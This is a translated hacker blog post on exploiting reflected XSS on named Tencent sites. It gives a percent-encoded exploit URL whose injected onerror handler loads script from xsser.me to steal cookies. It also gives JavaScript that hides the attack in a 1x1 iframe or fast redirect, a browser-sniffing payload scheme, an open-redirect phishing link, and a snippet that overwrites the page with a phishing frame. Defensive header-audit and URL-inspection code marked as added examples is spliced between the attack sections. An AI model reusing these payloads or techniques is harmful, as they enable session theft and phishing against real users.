A ramble on using reflected XSS.txt

Source: Internet
Author: User
Tags: reflection
A boring evening, no draft prepared; I write wherever my thoughts wander. Have a look.

Author: y35u

1. Reflected XSS is plentiful.

Reflected XSS is far more common than Flash XSS and stored XSS. So the larger a site's user base, the more powerful reflected XSS becomes: because there are so many of them, the number of users who take the bait rises greatly. Moreover, stored XSS gets closed off faster, while reflected XSS is closed relatively late.

In XSS it is generally held that stored is the most harmful, but it depends on whom you want to X (attack). If you want to X the administrator, stored is certainly the more dangerous. If you want to X many people (visitors with the same identity as you), stored XSS can be written as a worm and the effect is obvious; reflected can too, with the effect coming second. If you want to X a specified person (again a visitor like you), the effect is the same; see http://www.wooyun.org/bugs/wooyun-2010-011192.

2. How to find reflected XSS.

Typical tools, such as DOMinatorPro:
http://www.3hack.com/tools/DOMinatorPro%E7%A0%B4%E8%A7%A3%E7%89%88.txt
http://www.3hack.com/paper/Dominator%e4%bd%bf%e7%94%a8%e5%ae%9e%e4%be%8b-%e8%a7%86%e9%a2%91.txt
Of course there are more, such as Burp Suite's XSS scan plugin, and some privately written professional tools.

So for reflected XSS the saying goes: with the right tool in hand, there is no fear of ever running out of XSS.

A big shot said that even without tools you can find dozens on TX (Tencent) in a day. So it is skill that is frightening.
3. How to use reflected XSS "seamlessly".

Where reflected differs from stored is what we need to know; if we can compensate for the shortcomings of reflected XSS, we can deal with it.

0x1. The browser factor. The browser has the biggest impact on reflected XSS. Solution: bypass the various browsers; this can be done.

0x2. The reflected URL is easily spotted by a discerning eye. Solution: use an iframe and a URL jump.

4. Let's look at real cases.

A. http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"> and after the tag add:

    <script>
    // the full URL-encoded exp (the attack URL above with the payload appended)
    var exp = '%68%74%74%70%3a%2f%2f%63%74%63%2e%71%7a%73%2e%71%71%2e%63%6f%6d%2f%71%7a%6f%6e%65%2f%76%36%2f%6e%65%77%6c%69%6d%69%74%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f%73%3d%31%26%75%69%6e%3d%31%31%34%39%36%37%36%33%39%29%29%3b%22%3e%3c%69%6d%67%20%73%72%63%3d%6c%20%6f%6e%65%72%72%6f%72%3d%65%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%65%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2c%27%2f%2f%78%73%73%65%72%2e%6d%65%2f%39%4e%6b%42%77%79%3f%31%33%35%33%30%36%35%34%31%37%27%29';
    var urllll = unescape(exp); // decode
    var e = document.createElement('iframe');
    e.width = 1;
    e.height = 1;
    e.setAttribute('src', urllll);
    document.body.appendChild(e);
    </script>

User experience: on wooyun.org, the cookies are caught and transmitted to xsser.me.

A-2. If the iframe is not allowed, that is, the page in src breaks out of the iframe and would be exposed, then just jump instead. exp: http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));">&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639


The statement document.body.appendChild(e); together with the >&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639 part you can write into the JS on xsser.me, so that the URL is the same as the first exp. The function is to jump to the normal page:

    <script>
    var exp = '%68%74%74%70%3a%2f%2f%63%74%63%2e%71%7a%73%2e%71%71%2e%63%6f%6d%2f%71%7a%6f%6e%65%2f%76%36%2f%6e%65%77%6c%69%6d%69%74%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f%73%3d%31%26%75%69%6e%3d%31%31%34%39%36%37%36%33%39%29%29%3b%22%3e%3c%69%6d%67%20%73%72%63%3d%6c%20%6f%6e%65%72%72%6f%72%3d%65%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%65%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2c%27%2f%2f%78%73%73%65%72%2e%6d%65%2f%39%4e%6b%42%77%79%3f%31%33%35%33%30%36%35%34%31%37%27%29';
    var urllll = unescape(exp); // decode
    window.location.href = urllll;
    </script>

User experience: on wooyun.org, jump to the exp address and then on to the normal page. Because the exp address and the normal page address differ only at the very end and the jump is fast, anyone who is not the technical type does not notice.

B. If the exp is not universal, i.e. there are different exps for IE9 and Firefox, that is also very simple; there are plenty of articles on IE8, IE9 and Chrome bypasses. What we have to do is iframe an exp.js. exp.js is responsible for detecting the browser version and, according to the version, outputting a different exp. Compared with case A above there is just one more section of JS code that determines the browser version and writes a few exps, in the form of case A, for the main browsers: IE8, IE9, Firefox, Chrome and others (e.g. 360 and Sogou, which use the IE engine). Once exp.js is written in general form, whenever you have another exp you just swap in the exp without writing code again, once and for all.
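The tricks in cases A, A-2 and B depend on three things the target site's response headers control: whether the page may be framed from another origin, whether the session cookie is readable from script, and whether an injected inline handler such as onerror= runs at all. The following is an added example, not code from the original post: an audit function (auditHeaders and parseCsp are names chosen here) that reports each of those from a response's headers; the header objects and cookie names are constructed samples.

```javascript
// Added example, not code from the original post. Header objects and cookie names are constructed.
// "default-src 'self'; frame-ancestors 'none'" -> { 'default-src': ["'self'"], 'frame-ancestors': ["'none'"] }
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1).map(t => t.toLowerCase());
  }
  return directives;
}

function auditHeaders(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : {};
  // 1) A 1x1 iframe on an attacker-controlled origin: frame-ancestors wins over X-Frame-Options
  //    when both are present, and only '*' or a bare scheme lets an arbitrary origin frame the page.
  const ancestors = csp['frame-ancestors'];
  const xfo = String(h['x-frame-options'] || '').trim().toUpperCase();
  const frameable = ancestors
    ? ancestors.some(src => src === '*' || src === 'http:' || src === 'https:')
    : !(xfo === 'DENY' || xfo === 'SAMEORIGIN');
  // 2) Cookie grabbing through document.cookie only sees cookies set without HttpOnly.
  const setCookie = [].concat(h['set-cookie'] || []);
  const cookiesScriptReadable = setCookie
    .filter(c => !/;\s*httponly\b/i.test(c))
    .map(c => c.split('=')[0].trim());
  // 3) The onerror= handler that pulls in remote script is inline script: it runs when there is
  //    no CSP, or when script-src (falling back to default-src) carries 'unsafe-inline'.
  const scriptSrc = csp['script-src'] || csp['default-src'];
  const inlineHandlersAllowed = !scriptSrc || scriptSrc.includes("'unsafe-inline'");
  return { frameable, cookiesScriptReadable, inlineHandlersAllowed };
}

// Constructed sample: no framing protection, and the session cookie is readable by script.
const weakPage = auditHeaders({
  'Set-Cookie': ['uin=o0000000001; Path=/', 'skey=example; Path=/; HttpOnly'],
});
// Constructed sample: the same page after hardening; all three checks come back closed.
const hardenedPage = auditHeaders({
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
  'Set-Cookie': 'skey=example; Path=/; HttpOnly; Secure',
});
console.log(weakPage, hardenedPage);
```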

I showed it to a friend; they said it was very rotten and not at all brilliant. Embarrassing.

C. If there is a perfect iframe XSS, the phishing success rate is quite high: http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/ The http://xj.hk/tenpay/ part can be encrypted with a TX Weibo short URL.

Of course this XSS can also be used to catch cookies with JavaScript, but I think phishing is more harmful. When testing it at the time it was a dual-use type: if you are afraid the opponents will not be fooled, you can learn from case A and catch cookies; if you think the opponent is a newbie, the phishing success rate is quite high.

D. You want to catch cookies and phish at the same time (too greedy), so there is a conflict: the key to catching cookies is the current URL being on the other site, while phishing only works by framing the TX address; yet to be trusted the URL must itself be the TX address. Fish and bear's paw cannot both be had. If they are all pure newbies the URL is long, but you can still try; it is very simple, e.g. in case A, add to the xsser.me JS:

    top.document.body.innerHTML = "<iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;top:0 src=http://xj.hk/tenpay/></iframe>";

Combine this with the A-2 approach, e.g. the other way round: write a title such as "TX lottery, 100% winners", then quickly encrypt the wooyun.org address with the TX short URL, or just post it on Weibo directly...


Visiting the short URL goes through a two-level jump to the XSS address; at that point the xsser.me JS executes, first grabbing the cookies and then rewriting the page... Well, that is all the thinking for now; I will write more another time.
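The chain just described (short URL, redirect, reflected payload, cookie grab, page rewrite) leaves two things in the target site's request logs: a query parameter carrying injected markup, and a redirect parameter pointing off the site. The following is an added detection example, not code from the original post: it decodes each query value repeatedly (the exp above is itself a percent-encoded copy of the attack URL, and double-encoded parameters are a common way past naive filters) and flags both patterns in constructed request URLs shaped like cases A, A-2 and C. The hosts and paths are constructed, and inspectUrl and fullyDecode are names chosen here.

```javascript
// Added example, not code from the original post. Hosts, paths and parameters below are constructed.
const MARKERS = [
  /<\s*(img|script|iframe|svg)\b/i, // injected element, as in the "><img src=l onerror=... break-out
  /\bon[a-z]+\s*=/i,                // inline event handler
  /javascript:|\bunescape\s*\(/i,   // script URL, or the decode-then-execute trick
];

// Decode a query value repeatedly until it stops changing (bounded), so a payload hidden
// behind a second layer of percent-encoding is seen in its final form.
function fullyDecode(raw, maxRounds = 3) {
  let value = raw, rounds = 0;
  while (rounds < maxRounds) {
    let next;
    try { next = decodeURIComponent(value); } catch (e) { break; } // malformed sequence: stop
    if (next === value) break;
    value = next;
    rounds += 1;
  }
  return { value, rounds };
}

// Inspect one request URL: report injected markup and redirect parameters that point off the
// site (ownDomain and its subdomains count as on-site, like the &jump= back to the normal page).
function inspectUrl(rawUrl, ownDomain) {
  const findings = [];
  const query = new URL(rawUrl).search.slice(1);
  for (const pair of query ? query.split('&') : []) {
    const eq = pair.indexOf('=');
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const { value, rounds } = fullyDecode(eq < 0 ? '' : pair.slice(eq + 1));
    if (MARKERS.some(re => re.test(value))) {
      findings.push({ param: name, kind: rounds > 1 ? 'markup-injection (multi-encoded)' : 'markup-injection' });
    }
    if (/^https?:\/\//i.test(value)) {
      let host = '';
      try { host = new URL(value).hostname; } catch (e) { /* not a usable URL */ }
      if (host && host !== ownDomain && !host.endsWith('.' + ownDomain)) findings.push({ param: name, kind: 'off-site redirect', target: host });
    }
  }
  return findings;
}

// Constructed request URLs in the shapes of cases A, C and A-2 (the first one is benign).
const SAMPLE_URLS = [
  'https://www.example.com/index.html?s=1&uin=0000000001',
  'https://www.example.com/index.html?s=1&uin=1%29%29%3B%22%3E%3Cimg%20src%3Dl%20onerror%3Dalert%281%29%3E',
  'https://www.example.com/index.html?uin=1%2529%2529%253B%2522%253E%253Cimg%2520src%253Dl%2520onerror%253Dalert%25281%2529%253E',
  'https://pay.example.com/insure.shtml?redirecturl=http%3A%2F%2Fphish.example.net%2Fpay%2F',
  'https://www.example.com/index.html?uin=1%22%3E%3Cscript%3E&jump=http%3A%2F%2Fuser.example.com%2F1',
];
for (const u of SAMPLE_URLS) console.log(u.slice(0, 60), inspectUrl(u, 'example.com'));
```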
